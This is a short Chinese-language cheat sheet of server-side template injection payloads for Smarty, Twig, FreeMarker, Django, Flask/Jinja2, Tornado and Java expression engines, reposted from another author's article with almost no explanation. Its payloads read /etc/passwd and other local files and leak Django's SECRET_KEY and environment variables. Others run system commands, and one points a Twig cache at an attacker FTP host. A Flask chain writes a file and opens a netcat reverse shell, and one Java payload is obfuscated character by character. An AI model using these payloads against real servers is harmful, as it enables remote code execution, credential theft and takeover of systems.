SSTI的payload
转载自:K0rz3n大佬的一篇文章带你理解漏洞之 SSTI 漏洞
1.Smarty payload:
{self::getStreamVariable("file:///proc/self/loginuid")} 2.Twig payload: {{_self.env.setCache("ftp://attacker.net:2121")}} {{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")} 3.freeMarker payload: <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") } 1.Django http://localhost:8000/?email={user.groups.model._meta.app_config.module.admin.settings.SECRET_KEY} http://localhost:8000/?email={user.user_permissions.model._meta.app_config.module.admin.settings.SECRET_KEY} 2.Flask/Jinja2 {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aSHELL = system') }} //写文件 {{ config.from_pyfile('/tmp/evil') }} //加载system {{ config['SHELL']('nc xxxx xx -e /bin/sh') }} //执行命令反弹SHELL 3.Tornado http://117.78.26.79:31093/error?msg={{handler.settings}} 2.JAVA payload: ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}